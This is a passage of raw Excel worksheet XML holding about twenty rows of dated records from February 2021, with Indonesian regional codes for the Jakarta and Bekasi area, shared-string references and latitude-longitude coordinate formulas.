      </c>
      <c r="E3217" t="s">
        <v>23</v>
      </c>
      <c r="G3217" t="s">
        <v>10769</v>
      </c>
      <c r="H3217" t="s">
        <v>26</v>
      </c>
      <c r="J3217" t="s">
        <v>6605</v>
      </c>
      <c r="L3217" t="s">
        <v>10770</v>
      </c>
      <c r="M3217">
        <v>3171010002</v>
      </c>
      <c r="N3217">
        <v>3171010</v>
      </c>
      <c r="O3217">
        <v>3171</v>
      </c>
      <c r="P3217">
        <v>31</v>
      </c>
      <c r="Q3217" t="s">
        <v>6607</v>
      </c>
      <c r="R3217" t="s">
        <v>264</v>
      </c>
      <c r="S3217" t="s">
        <v>108</v>
      </c>
      <c r="T3217" t="s">
        <v>33</v>
      </c>
      <c r="U3217" s="5">
        <v>10682609</v>
      </c>
      <c r="V3217" s="5" t="s">
        <v>17346</v>
      </c>
      <c r="W3217" s="5">
        <v>-633733</v>
      </c>
      <c r="X3217" t="s">
        <v>21083</v>
      </c>
      <c r="Y3217" t="str">
        <f t="shared" si="50"/>
        <v>-6.33733,106.82609</v>
      </c>
    </row>
    <row r="3218" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3218">
        <v>258689</v>
      </c>
      <c r="B3218" s="1">
        <v>44246</v>
      </c>
      <c r="C3218" s="2">
        <v>0.99083333333333334</v>
      </c>
      <c r="D3218" t="s">
        <v>22</v>
      </c>
      <c r="E3218" t="s">
        <v>23</v>
      </c>
      <c r="F3218" t="s">
        <v>10771</v>
      </c>
      <c r="G3218" t="s">
        <v>10772</v>
      </c>
      <c r="H3218" t="s">
        <v>26</v>
      </c>
      <c r="I3218" t="s">
        <v>8140</v>
      </c>
      <c r="J3218" t="s">
        <v>2627</v>
      </c>
      <c r="M3218">
        <v>3275020001</v>
      </c>
      <c r="N3218">
        <v>3275020</v>
      </c>
      <c r="O3218">
        <v>3275</v>
      </c>
      <c r="P3218">
        <v>32</v>
      </c>
      <c r="Q3218" t="s">
        <v>5124</v>
      </c>
      <c r="R3218" t="s">
        <v>828</v>
      </c>
      <c r="S3218" t="s">
        <v>41</v>
      </c>
      <c r="T3218" t="s">
        <v>42</v>
      </c>
      <c r="U3218" s="5">
        <v>10695880</v>
      </c>
      <c r="V3218" s="5" t="s">
        <v>15295</v>
      </c>
      <c r="W3218" s="5">
        <v>-632311</v>
      </c>
      <c r="X3218" t="s">
        <v>21084</v>
      </c>
      <c r="Y3218" t="str">
        <f t="shared" si="50"/>
        <v>-6.32311,106.95880</v>
      </c>
    </row>
    <row r="3219" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3219">
        <v>258690</v>
      </c>
      <c r="B3219" s="1">
        <v>44246</v>
      </c>
      <c r="C3219" s="2">
        <v>0.99152777777777779</v>
      </c>
      <c r="D3219" t="s">
        <v>22</v>
      </c>
      <c r="E3219" t="s">
        <v>23</v>
      </c>
      <c r="F3219" t="s">
        <v>10773</v>
      </c>
      <c r="G3219" t="s">
        <v>10774</v>
      </c>
      <c r="H3219" t="s">
        <v>26</v>
      </c>
      <c r="I3219" t="s">
        <v>197</v>
      </c>
      <c r="J3219" t="s">
        <v>3300</v>
      </c>
      <c r="L3219" t="s">
        <v>10775</v>
      </c>
      <c r="M3219">
        <v>3171020005</v>
      </c>
      <c r="N3219">
        <v>3171020</v>
      </c>
      <c r="O3219">
        <v>3171</v>
      </c>
      <c r="P3219">
        <v>31</v>
      </c>
      <c r="Q3219" t="s">
        <v>483</v>
      </c>
      <c r="R3219" t="s">
        <v>484</v>
      </c>
      <c r="S3219" t="s">
        <v>108</v>
      </c>
      <c r="T3219" t="s">
        <v>33</v>
      </c>
      <c r="U3219" s="5">
        <v>10683489</v>
      </c>
      <c r="V3219" s="5" t="s">
        <v>16147</v>
      </c>
      <c r="W3219" s="5">
        <v>-628688</v>
      </c>
      <c r="X3219" t="s">
        <v>21085</v>
      </c>
      <c r="Y3219" t="str">
        <f t="shared" si="50"/>
        <v>-6.28688,106.83489</v>
      </c>
    </row>
    <row r="3220" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3220">
        <v>258691</v>
      </c>
      <c r="B3220" s="1">
        <v>44246</v>
      </c>
      <c r="C3220" s="2">
        <v>0.99229166666666668</v>
      </c>
      <c r="D3220" t="s">
        <v>22</v>
      </c>
      <c r="E3220" t="s">
        <v>23</v>
      </c>
      <c r="F3220" t="s">
        <v>10776</v>
      </c>
      <c r="G3220" t="s">
        <v>10777</v>
      </c>
      <c r="H3220" t="s">
        <v>26</v>
      </c>
      <c r="I3220" t="s">
        <v>137</v>
      </c>
      <c r="J3220" t="s">
        <v>4933</v>
      </c>
      <c r="L3220" t="s">
        <v>10778</v>
      </c>
      <c r="M3220">
        <v>3172030006</v>
      </c>
      <c r="N3220">
        <v>3172030</v>
      </c>
      <c r="O3220">
        <v>3172</v>
      </c>
      <c r="P3220">
        <v>31</v>
      </c>
      <c r="Q3220" t="s">
        <v>462</v>
      </c>
      <c r="R3220" t="s">
        <v>228</v>
      </c>
      <c r="S3220" t="s">
        <v>49</v>
      </c>
      <c r="T3220" t="s">
        <v>33</v>
      </c>
      <c r="U3220" s="5">
        <v>10690034</v>
      </c>
      <c r="V3220" s="5" t="s">
        <v>15463</v>
      </c>
      <c r="W3220" s="5">
        <v>-631780</v>
      </c>
      <c r="X3220" t="s">
        <v>21086</v>
      </c>
      <c r="Y3220" t="str">
        <f t="shared" si="50"/>
        <v>-6.31780,106.90034</v>
      </c>
    </row>
    <row r="3221" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3221">
        <v>258692</v>
      </c>
      <c r="B3221" s="1">
        <v>44246</v>
      </c>
      <c r="C3221" s="2">
        <v>0.9932523148148148</v>
      </c>
      <c r="D3221" t="s">
        <v>22</v>
      </c>
      <c r="E3221" t="s">
        <v>23</v>
      </c>
      <c r="F3221" t="s">
        <v>10779</v>
      </c>
      <c r="G3221" t="s">
        <v>10780</v>
      </c>
      <c r="H3221" t="s">
        <v>26</v>
      </c>
      <c r="I3221" t="s">
        <v>3668</v>
      </c>
      <c r="J3221" t="s">
        <v>10781</v>
      </c>
      <c r="L3221" t="s">
        <v>10782</v>
      </c>
      <c r="M3221">
        <v>3172050006</v>
      </c>
      <c r="N3221">
        <v>3172050</v>
      </c>
      <c r="O3221">
        <v>3172</v>
      </c>
      <c r="P3221">
        <v>31</v>
      </c>
      <c r="Q3221" t="s">
        <v>357</v>
      </c>
      <c r="R3221" t="s">
        <v>358</v>
      </c>
      <c r="S3221" t="s">
        <v>49</v>
      </c>
      <c r="T3221" t="s">
        <v>33</v>
      </c>
      <c r="U3221" s="5">
        <v>10686439</v>
      </c>
      <c r="V3221" s="5" t="s">
        <v>17347</v>
      </c>
      <c r="W3221" s="5">
        <v>-626360</v>
      </c>
      <c r="X3221" t="s">
        <v>21087</v>
      </c>
      <c r="Y3221" t="str">
        <f t="shared" si="50"/>
        <v>-6.26360,106.86439</v>
      </c>
    </row>
    <row r="3222" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3222">
        <v>258693</v>
      </c>
      <c r="B3222" s="1">
        <v>44246</v>
      </c>
      <c r="C3222" s="2">
        <v>0.99324074074074076</v>
      </c>
      <c r="D3222" t="s">
        <v>22</v>
      </c>
      <c r="E3222" t="s">
        <v>23</v>
      </c>
      <c r="F3222" t="s">
        <v>10783</v>
      </c>
      <c r="G3222" t="s">
        <v>10784</v>
      </c>
      <c r="H3222" t="s">
        <v>26</v>
      </c>
      <c r="I3222" t="s">
        <v>197</v>
      </c>
      <c r="J3222" t="s">
        <v>3300</v>
      </c>
      <c r="L3222" t="s">
        <v>10785</v>
      </c>
      <c r="M3222">
        <v>3171020005</v>
      </c>
      <c r="N3222">
        <v>3171020</v>
      </c>
      <c r="O3222">
        <v>3171</v>
      </c>
      <c r="P3222">
        <v>31</v>
      </c>
      <c r="Q3222" t="s">
        <v>483</v>
      </c>
      <c r="R3222" t="s">
        <v>484</v>
      </c>
      <c r="S3222" t="s">
        <v>108</v>
      </c>
      <c r="T3222" t="s">
        <v>33</v>
      </c>
      <c r="U3222" s="5">
        <v>10683486</v>
      </c>
      <c r="V3222" s="5" t="s">
        <v>17348</v>
      </c>
      <c r="W3222" s="5">
        <v>-628677</v>
      </c>
      <c r="X3222" t="s">
        <v>21088</v>
      </c>
      <c r="Y3222" t="str">
        <f t="shared" si="50"/>
        <v>-6.28677,106.83486</v>
      </c>
    </row>
    <row r="3223" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3223">
        <v>258694</v>
      </c>
      <c r="B3223" s="1">
        <v>44246</v>
      </c>
      <c r="C3223" s="2">
        <v>0.99331018518518521</v>
      </c>
      <c r="D3223" t="s">
        <v>22</v>
      </c>
      <c r="E3223" t="s">
        <v>23</v>
      </c>
      <c r="F3223" t="s">
        <v>10786</v>
      </c>
      <c r="G3223" t="s">
        <v>10787</v>
      </c>
      <c r="H3223" t="s">
        <v>26</v>
      </c>
      <c r="I3223" t="s">
        <v>1046</v>
      </c>
      <c r="J3223" t="s">
        <v>2627</v>
      </c>
      <c r="L3223" t="s">
        <v>10788</v>
      </c>
      <c r="M3223">
        <v>3275010010</v>
      </c>
      <c r="N3223">
        <v>3275010</v>
      </c>
      <c r="O3223">
        <v>3275</v>
      </c>
      <c r="P3223">
        <v>32</v>
      </c>
      <c r="Q3223" t="s">
        <v>286</v>
      </c>
      <c r="R3223" t="s">
        <v>287</v>
      </c>
      <c r="S3223" t="s">
        <v>41</v>
      </c>
      <c r="T3223" t="s">
        <v>42</v>
      </c>
      <c r="U3223" s="5">
        <v>10694863</v>
      </c>
      <c r="V3223" s="5" t="s">
        <v>17349</v>
      </c>
      <c r="W3223" s="5">
        <v>-626231</v>
      </c>
      <c r="X3223" t="s">
        <v>21089</v>
      </c>
      <c r="Y3223" t="str">
        <f t="shared" si="50"/>
        <v>-6.26231,106.94863</v>
      </c>
    </row>
    <row r="3224" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3224">
        <v>258717</v>
      </c>
      <c r="B3224" s="1">
        <v>44246</v>
      </c>
      <c r="C3224" s="2">
        <v>0.99622685185185189</v>
      </c>
      <c r="D3224" t="s">
        <v>22</v>
      </c>
      <c r="E3224" t="s">
        <v>23</v>
      </c>
      <c r="F3224" t="s">
        <v>10789</v>
      </c>
      <c r="G3224" t="s">
        <v>10790</v>
      </c>
      <c r="H3224" t="s">
        <v>26</v>
      </c>
      <c r="I3224" t="s">
        <v>666</v>
      </c>
      <c r="J3224" t="s">
        <v>4994</v>
      </c>
      <c r="M3224">
        <v>3171080003</v>
      </c>
      <c r="N3224">
        <v>3171080</v>
      </c>
      <c r="O3224">
        <v>3171</v>
      </c>
      <c r="P3224">
        <v>31</v>
      </c>
      <c r="Q3224" t="s">
        <v>3677</v>
      </c>
      <c r="R3224" t="s">
        <v>1403</v>
      </c>
      <c r="S3224" t="s">
        <v>108</v>
      </c>
      <c r="T3224" t="s">
        <v>33</v>
      </c>
      <c r="U3224" s="5">
        <v>10682532</v>
      </c>
      <c r="V3224" s="5" t="s">
        <v>17350</v>
      </c>
      <c r="W3224" s="5">
        <v>-625455</v>
      </c>
      <c r="X3224" t="s">
        <v>21090</v>
      </c>
      <c r="Y3224" t="str">
        <f t="shared" si="50"/>
        <v>-6.25455,106.82532</v>
      </c>
    </row>
    <row r="3225" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3225">
        <v>258718</v>
      </c>
      <c r="B3225" s="1">
        <v>44246</v>
      </c>
      <c r="C3225" s="2">
        <v>0.99685185185185177</v>
      </c>
      <c r="D3225" t="s">
        <v>22</v>
      </c>
      <c r="E3225" t="s">
        <v>23</v>
      </c>
      <c r="F3225" t="s">
        <v>10791</v>
      </c>
      <c r="G3225" t="s">
        <v>10792</v>
      </c>
      <c r="H3225" t="s">
        <v>26</v>
      </c>
      <c r="I3225" t="s">
        <v>2005</v>
      </c>
      <c r="J3225" t="s">
        <v>2627</v>
      </c>
      <c r="L3225" t="s">
        <v>10793</v>
      </c>
      <c r="M3225">
        <v>3275041004</v>
      </c>
      <c r="N3225">
        <v>3275041</v>
      </c>
      <c r="O3225">
        <v>3275</v>
      </c>
      <c r="P3225">
        <v>32</v>
      </c>
      <c r="Q3225" t="s">
        <v>133</v>
      </c>
      <c r="R3225" t="s">
        <v>134</v>
      </c>
      <c r="S3225" t="s">
        <v>41</v>
      </c>
      <c r="T3225" t="s">
        <v>42</v>
      </c>
      <c r="U3225" s="5">
        <v>10700512</v>
      </c>
      <c r="V3225" s="5" t="s">
        <v>17351</v>
      </c>
      <c r="W3225" s="5">
        <v>-626161</v>
      </c>
      <c r="X3225" t="s">
        <v>21091</v>
      </c>
      <c r="Y3225" t="str">
        <f t="shared" si="50"/>
        <v>-6.26161,107.00512</v>
      </c>
    </row>
    <row r="3226" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3226">
        <v>258724</v>
      </c>
      <c r="B3226" s="1">
        <v>44246</v>
      </c>
      <c r="C3226" s="2">
        <v>0.99444444444444446</v>
      </c>
      <c r="D3226" t="s">
        <v>2648</v>
      </c>
      <c r="E3226" t="s">
        <v>23</v>
      </c>
      <c r="G3226" t="s">
        <v>10794</v>
      </c>
      <c r="H3226" t="s">
        <v>26</v>
      </c>
      <c r="I3226" t="s">
        <v>103</v>
      </c>
      <c r="J3226" t="s">
        <v>45</v>
      </c>
      <c r="L3226" t="s">
        <v>10795</v>
      </c>
      <c r="M3226">
        <v>3172060004</v>
      </c>
      <c r="N3226">
        <v>3172060</v>
      </c>
      <c r="O3226">
        <v>3172</v>
      </c>
      <c r="P3226">
        <v>31</v>
      </c>
      <c r="Q3226" t="s">
        <v>47</v>
      </c>
      <c r="R3226" t="s">
        <v>48</v>
      </c>
      <c r="S3226" t="s">
        <v>49</v>
      </c>
      <c r="T3226" t="s">
        <v>33</v>
      </c>
      <c r="U3226" s="5">
        <v>10689248</v>
      </c>
      <c r="V3226" s="5" t="s">
        <v>17352</v>
      </c>
      <c r="W3226" s="5">
        <v>-623638</v>
      </c>
      <c r="X3226" t="s">
        <v>21092</v>
      </c>
      <c r="Y3226" t="str">
        <f t="shared" si="50"/>
        <v>-6.23638,106.89248</v>
      </c>
    </row>
    <row r="3227" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3227">
        <v>258742</v>
      </c>
      <c r="B3227" s="1">
        <v>44246</v>
      </c>
      <c r="C3227" s="2">
        <v>0.99934027777777779</v>
      </c>
      <c r="D3227" t="s">
        <v>22</v>
      </c>
      <c r="E3227" t="s">
        <v>23</v>
      </c>
      <c r="F3227" t="s">
        <v>10796</v>
      </c>
      <c r="G3227" t="s">
        <v>10797</v>
      </c>
      <c r="H3227" t="s">
        <v>26</v>
      </c>
      <c r="I3227" t="s">
        <v>10798</v>
      </c>
      <c r="J3227" t="s">
        <v>10544</v>
      </c>
      <c r="L3227" t="s">
        <v>10799</v>
      </c>
      <c r="M3227">
        <v>3171020005</v>
      </c>
      <c r="N3227">
        <v>3171020</v>
      </c>
      <c r="O3227">
        <v>3171</v>
      </c>
      <c r="P3227">
        <v>31</v>
      </c>
      <c r="Q3227" t="s">
        <v>483</v>
      </c>
      <c r="R3227" t="s">
        <v>484</v>
      </c>
      <c r="S3227" t="s">
        <v>108</v>
      </c>
      <c r="T3227" t="s">
        <v>33</v>
      </c>
      <c r="U3227" s="5">
        <v>10682780</v>
      </c>
      <c r="V3227" s="5" t="s">
        <v>17353</v>
      </c>
      <c r="W3227" s="5">
        <v>-628564</v>
      </c>
      <c r="X3227" t="s">
        <v>21093</v>
      </c>
      <c r="Y3227" t="str">
        <f t="shared" si="50"/>
        <v>-6.28564,106.82780</v>
      </c>
    </row>
    <row r="3228" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3228">
        <v>258743</v>
      </c>
      <c r="B3228" s="1">
        <v>44246</v>
      </c>
      <c r="C3228" s="2">
        <v>0.99973379629629633</v>
      </c>
      <c r="D3228" t="s">
        <v>22</v>
      </c>
      <c r="E3228" t="s">
        <v>23</v>
      </c>
      <c r="F3228" t="s">
        <v>10800</v>
      </c>
      <c r="G3228" t="s">
        <v>10801</v>
      </c>
      <c r="H3228" t="s">
        <v>26</v>
      </c>
      <c r="I3228" t="s">
        <v>1542</v>
      </c>
      <c r="J3228" t="s">
        <v>2627</v>
      </c>
      <c r="L3228" t="s">
        <v>10802</v>
      </c>
      <c r="M3228">
        <v>3216061003</v>
      </c>
      <c r="N3228">
        <v>3216061</v>
      </c>
      <c r="O3228">
        <v>3216</v>
      </c>
      <c r="P3228">
        <v>32</v>
      </c>
      <c r="Q3228" t="s">
        <v>10803</v>
      </c>
      <c r="R3228" t="s">
        <v>55</v>
      </c>
      <c r="S3228" t="s">
        <v>41</v>
      </c>
      <c r="T3228" t="s">
        <v>42</v>
      </c>
      <c r="U3228" s="5">
        <v>10715330</v>
      </c>
      <c r="V3228" s="5" t="s">
        <v>17354</v>
      </c>
      <c r="W3228" s="5">
        <v>-628176</v>
      </c>
      <c r="X3228" t="s">
        <v>20983</v>
      </c>
      <c r="Y3228" t="str">
        <f t="shared" si="50"/>
        <v>-6.28176,107.15330</v>
      </c>
    </row>
    <row r="3229" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3229">
        <v>258868</v>
      </c>
      <c r="B3229" s="1">
        <v>44246</v>
      </c>
      <c r="C3229" s="2">
        <v>0.94270833333333337</v>
      </c>
      <c r="D3229" t="s">
        <v>85</v>
      </c>
      <c r="E3229" t="s">
        <v>23</v>
      </c>
      <c r="F3229" t="s">
        <v>10804</v>
      </c>
      <c r="G3229" t="s">
        <v>10805</v>
      </c>
      <c r="H3229" t="s">
        <v>26</v>
      </c>
      <c r="J3229" t="s">
        <v>10603</v>
      </c>
      <c r="K3229" t="s">
        <v>10806</v>
      </c>
      <c r="L3229" t="s">
        <v>10807</v>
      </c>
      <c r="M3229">
        <v>3171070001</v>
      </c>
      <c r="N3229">
        <v>3171070</v>
      </c>
      <c r="O3229">
        <v>3171</v>
      </c>
      <c r="P3229">
        <v>31</v>
      </c>
      <c r="Q3229" t="s">
        <v>120</v>
      </c>
      <c r="R3229" t="s">
        <v>121</v>
      </c>
      <c r="S3229" t="s">
        <v>108</v>
      </c>
      <c r="T3229" t="s">
        <v>33</v>
      </c>
      <c r="U3229" s="5">
        <v>10682225</v>
      </c>
      <c r="V3229" s="5" t="s">
        <v>17355</v>
      </c>
      <c r="W3229" s="5">
        <v>-626855</v>
      </c>
      <c r="X3229" t="s">
        <v>21094</v>
      </c>
      <c r="Y3229" t="str">
        <f t="shared" si="50"/>
        <v>-6.26855,106.82225</v>
      </c>
    </row>
    <row r="3230" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3230">
        <v>258895</v>
      </c>
      <c r="B3230" s="1">
        <v>44246</v>
      </c>
      <c r="C3230" s="2">
        <v>0.99165509259259255</v>
      </c>
      <c r="D3230" t="s">
        <v>85</v>
      </c>
      <c r="E3230" t="s">
        <v>23</v>
      </c>
      <c r="F3230" t="s">
        <v>10808</v>
      </c>
      <c r="G3230" t="s">
        <v>10809</v>
      </c>
      <c r="H3230" t="s">
        <v>26</v>
      </c>
      <c r="J3230" t="s">
        <v>10603</v>
      </c>
      <c r="K3230" t="s">
        <v>10810</v>
      </c>
      <c r="L3230" t="s">
        <v>10811</v>
      </c>
      <c r="M3230">
        <v>3171070001</v>
      </c>
      <c r="N3230">
        <v>3171070</v>
      </c>
      <c r="O3230">
        <v>3171</v>
      </c>
      <c r="P3230">
        <v>31</v>
      </c>
      <c r="Q3230" t="s">
        <v>120</v>
      </c>
      <c r="R3230" t="s">
        <v>121</v>
      </c>
      <c r="S3230" t="s">
        <v>108</v>
      </c>
      <c r="T3230" t="s">
        <v>33</v>
      </c>
      <c r="U3230" s="5">
        <v>10682229</v>
      </c>
      <c r="V3230" s="5" t="s">
        <v>15800</v>
      </c>
      <c r="W3230" s="5">
        <v>-626851</v>
      </c>
      <c r="X3230" t="s">
        <v>21095</v>
      </c>
      <c r="Y3230" t="str">
        <f t="shared" si="50"/>
        <v>-6.26851,106.82229</v>
      </c>
    </row>
    <row r="3231" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3231">
        <v>258744</v>
      </c>
      <c r="B3231" s="1">
        <v>44247</v>
      </c>
      <c r="C3231" s="2">
        <v>6.2500000000000001E-4</v>
      </c>
      <c r="D3231" t="s">
        <v>22</v>
      </c>
      <c r="E3231" t="s">
        <v>23</v>
      </c>
      <c r="F3231" t="s">
        <v>10812</v>
      </c>
      <c r="G3231" t="s">
        <v>10813</v>
      </c>
      <c r="H3231" t="s">
        <v>26</v>
      </c>
      <c r="I3231" t="s">
        <v>193</v>
      </c>
      <c r="J3231" t="s">
        <v>10544</v>
      </c>
      <c r="L3231" t="s">
        <v>10814</v>
      </c>
      <c r="M3231">
        <v>3171020005</v>
      </c>
      <c r="N3231">
        <v>3171020</v>
      </c>
      <c r="O3231">
        <v>3171</v>
      </c>
      <c r="P3231">
        <v>31</v>
      </c>
      <c r="Q3231" t="s">
        <v>483</v>
      </c>
      <c r="R3231" t="s">
        <v>484</v>
      </c>
      <c r="S3231" t="s">
        <v>108</v>
      </c>
      <c r="T3231" t="s">
        <v>33</v>
      </c>
      <c r="U3231" s="5">
        <v>10682781</v>
      </c>
      <c r="V3231" s="5" t="s">
        <v>17356</v>
      </c>
      <c r="W3231" s="5">
        <v>-628553</v>
      </c>
      <c r="X3231" t="s">
        <v>21096</v>
      </c>
      <c r="Y3231" t="str">
        <f t="shared" si="50"/>
        <v>-6.28553,106.82781</v>
      </c>
    </row>
    <row r="3232" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3232">
        <v>258745</v>
      </c>
      <c r="B3232" s="1">
        <v>44247</v>
      </c>
      <c r="C3232" s="2">
        <v>9.2592592592592585E-4</v>
      </c>
      <c r="D3232" t="s">
        <v>22</v>
      </c>
      <c r="E3232" t="s">
        <v>23</v>
      </c>
      <c r="F3232" t="s">
        <v>10815</v>
      </c>
      <c r="G3232" t="s">
        <v>10816</v>
      </c>
      <c r="H3232" t="s">
        <v>26</v>
      </c>
      <c r="I3232" t="s">
        <v>10817</v>
      </c>
      <c r="J3232" t="s">
        <v>5616</v>
      </c>
      <c r="M3232">
        <v>3171070002</v>
      </c>
      <c r="N3232">
        <v>3171070</v>
      </c>
      <c r="O3232">
        <v>3171</v>
      </c>
      <c r="P3232">
        <v>31</v>
      </c>
      <c r="Q3232" t="s">
        <v>2142</v>
      </c>
      <c r="R3232" t="s">
        <v>121</v>
      </c>
      <c r="S3232" t="s">
        <v>108</v>
      </c>
      <c r="T3232" t="s">
        <v>33</v>
      </c>
      <c r="U3232" s="5">
        <v>10682080</v>
      </c>
      <c r="V3232" s="5" t="s">
        <v>17357</v>
      </c>
      <c r="W3232" s="5">
        <v>-624728</v>
      </c>
      <c r="X3232" t="s">
        <v>21097</v>
      </c>
      <c r="Y3232" t="str">
        <f t="shared" si="50"/>
        <v>-6.24728,106.82080</v>
      </c>
    </row>
    <row r="3233" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3233">
        <v>258746</v>
      </c>
      <c r="B3233" s="1">
        <v>44247</v>
      </c>
      <c r="C3233" s="2">
        <v>3.7037037037037035E-4</v>
      </c>
      <c r="D3233" t="s">
        <v>22</v>
      </c>
      <c r="E3233" t="s">
        <v>23</v>
      </c>
      <c r="F3233" t="s">
        <v>10818</v>
      </c>
      <c r="G3233" t="s">
        <v>10819</v>
      </c>
      <c r="H3233" t="s">
        <v>26</v>
      </c>
      <c r="I3233" t="s">
        <v>893</v>
      </c>
      <c r="J3233" t="s">
        <v>2627</v>
      </c>
      <c r="L3233" t="s">
        <v>10820</v>
      </c>
      <c r="M3233">
        <v>3275010008</v>
      </c>
      <c r="N3233">
        <v>3275010</v>
      </c>
      <c r="O3233">
        <v>3275</v>
      </c>
      <c r="P3233">
        <v>32</v>
      </c>
      <c r="Q3233" t="s">
        <v>2236</v>
      </c>
      <c r="R3233" t="s">
        <v>287</v>
      </c>
      <c r="S3233" t="s">
        <v>41</v>
      </c>
      <c r="T3233" t="s">
        <v>42</v>
      </c>
      <c r="U3233" s="5">
        <v>10693794</v>
      </c>
      <c r="V3233" s="5" t="s">
        <v>17358</v>
      </c>
      <c r="W3233" s="5">
        <v>-628391</v>
      </c>
      <c r="X3233" t="s">
        <v>21098</v>
      </c>
      <c r="Y3233" t="str">
        <f t="shared" si="50"/>
        <v>-6.28391,106.93794</v>
      </c>
    </row>
    <row r="3234" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3234">
        <v>258770</v>
      </c>
      <c r="B3234" s="1">
        <v>44247</v>
      </c>
      <c r="C3234" s="2">
        <v>2.8240740740740739E-3</v>
      </c>
      <c r="D3234" t="s">
        <v>22</v>
      </c>
      <c r="E3234" t="s">
        <v>23</v>
      </c>
      <c r="F3234" t="s">
        <v>10821</v>
      </c>
      <c r="G3234" t="s">
        <v>10822</v>
      </c>
      <c r="H3234" t="s">
        <v>26</v>
      </c>
      <c r="I3234" t="s">
        <v>383</v>
      </c>
      <c r="J3234" t="s">
        <v>3300</v>
      </c>
      <c r="L3234" t="s">
        <v>10823</v>
      </c>
      <c r="M3234">
        <v>3171020005</v>
      </c>
      <c r="N3234">
        <v>3171020</v>
      </c>
      <c r="O3234">
        <v>3171</v>
      </c>
      <c r="P3234">
        <v>31</v>
      </c>
      <c r="Q3234" t="s">
        <v>483</v>
      </c>
      <c r="R3234" t="s">
        <v>484</v>
      </c>
      <c r="S3234" t="s">
        <v>108</v>
      </c>
      <c r="T3234" t="s">
        <v>33</v>
      </c>
      <c r="U3234" s="5">
        <v>10683406</v>
      </c>
      <c r="V3234" s="5" t="s">
        <v>17359</v>
      </c>
      <c r="W3234" s="5">
        <v>-628854</v>
      </c>
      <c r="X3234" t="s">
        <v>21099</v>
      </c>
      <c r="Y3234" t="str">
        <f t="shared" si="50"/>
        <v>-6.28854,106.83406</v>
      </c>
    </row>
    <row r="3235" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3235">
        <v>258794</v>
      </c>
      <c r="B3235" s="1">
        <v>44247</v>
      </c>
      <c r="C3235" s="2">
        <v>5.7870370370370376E-3</v>
      </c>
      <c r="D3235" t="s">
        <v>22</v>
      </c>
      <c r="E3235" t="s">
        <v>23</v>
      </c>
      <c r="F3235" t="s">
        <v>10824</v>
      </c>
      <c r="H3235" t="s">
        <v>26</v>
      </c>
      <c r="I3235" t="s">
        <v>893</v>
      </c>
      <c r="J3235" t="s">
        <v>6293</v>
      </c>
      <c r="L3235" t="s">
        <v>10825</v>
      </c>
      <c r="M3235">
        <v>3172050005</v>
      </c>
      <c r="N3235">
        <v>3172050</v>
      </c>
      <c r="O3235">
        <v>3172</v>
      </c>
      <c r="P3235">
        <v>31</v>
      </c>
      <c r="Q3235" t="s">
        <v>358</v>
      </c>
      <c r="R3235" t="s">
        <v>358</v>
      </c>
      <c r="S3235" t="s">
        <v>49</v>
      </c>
      <c r="T3235" t="s">
        <v>33</v>
      </c>
      <c r="U3235" s="5">
        <v>10687099</v>
      </c>
      <c r="V3235" s="5" t="s">
        <v>17360</v>
      </c>
      <c r="W3235" s="5">
        <v>-628699</v>
      </c>
      <c r="X3235" t="s">
        <v>21100</v>
      </c>
      <c r="Y3235" t="str">
        <f t="shared" si="50"/>
        <v>-6.28699,106.87099</v>
      </c>
    </row>
    <row r="3236" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3236">
        <v>258795</v>
      </c>
      <c r="B3236" s="1">
        <v>44247</v>
      </c>
      <c r="C3236" s="2">
        <v>7.1527777777777787E-3</v>
      </c>
      <c r="D3236" t="s">
        <v>22</v>
      </c>
      <c r="E3236" t="s">
        <v>23</v>
      </c>
      <c r="F3236" t="s">
        <v>10826</v>
      </c>
      <c r="G3236" t="s">
        <v>10827</v>
      </c>
      <c r="H3236" t="s">
        <v>26</v>
      </c>
      <c r="I3236" t="s">
        <v>965</v>
      </c>
      <c r="J3236" t="s">
        <v>10669</v>
      </c>
      <c r="L3236" t="s">
        <v>10828</v>
      </c>
      <c r="M3236">
        <v>3171020005</v>
      </c>
      <c r="N3236">
        <v>3171020</v>
      </c>
      <c r="O3236">
        <v>3171</v>
      </c>
      <c r="P3236">
        <v>31</v>
      </c>
      <c r="Q3236" t="s">
        <v>483</v>
      </c>
      <c r="R3236" t="s">
        <v>484</v>
      </c>
      <c r="S3236" t="s">
        <v>108</v>
      </c>
      <c r="T3236" t="s">
        <v>33</v>
      </c>
      <c r="U3236" s="5">
        <v>10683405</v>
      </c>
      <c r="V3236" s="5" t="s">
        <v>17361</v>
      </c>
      <c r="W3236" s="5">
        <v>-628322</v>
      </c>
      <c r="X3236" t="s">
        <v>21101</v>
      </c>
      <c r="Y3236" t="str">
        <f t="shared" si="50"/>
        <v>-6.28322,106.83405</v>
      </c>
    </row>
    <row r="3237" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3237">
        <v>258842</v>
      </c>
      <c r="B3237" s="1">
        <v>44247</v>
      </c>
      <c r="C3237" s="2">
        <v>1.0254629629629629E-2</v>
      </c>
      <c r="D3237" t="s">
        <v>22</v>
      </c>
      <c r="E3237" t="s">
        <v>23</v>
      </c>
      <c r="F3237" t="s">
        <v>10829</v>
      </c>
      <c r="G3237" t="s">
        <v>10830</v>
      </c>
      <c r="H3237" t="s">
        <v>26</v>
      </c>
      <c r="I3237" t="s">
        <v>1389</v>
      </c>
      <c r="J3237" t="s">
        <v>10831</v>
      </c>
      <c r="L3237" t="s">
        <v>10832</v>
      </c>
      <c r="M3237">
        <v>3172040003</v>
      </c>
      <c r="N3237">
        <v>3172040</v>
      </c>
      <c r="O3237">
        <v>3172</v>
      </c>
      <c r="P3237">
        <v>31</v>
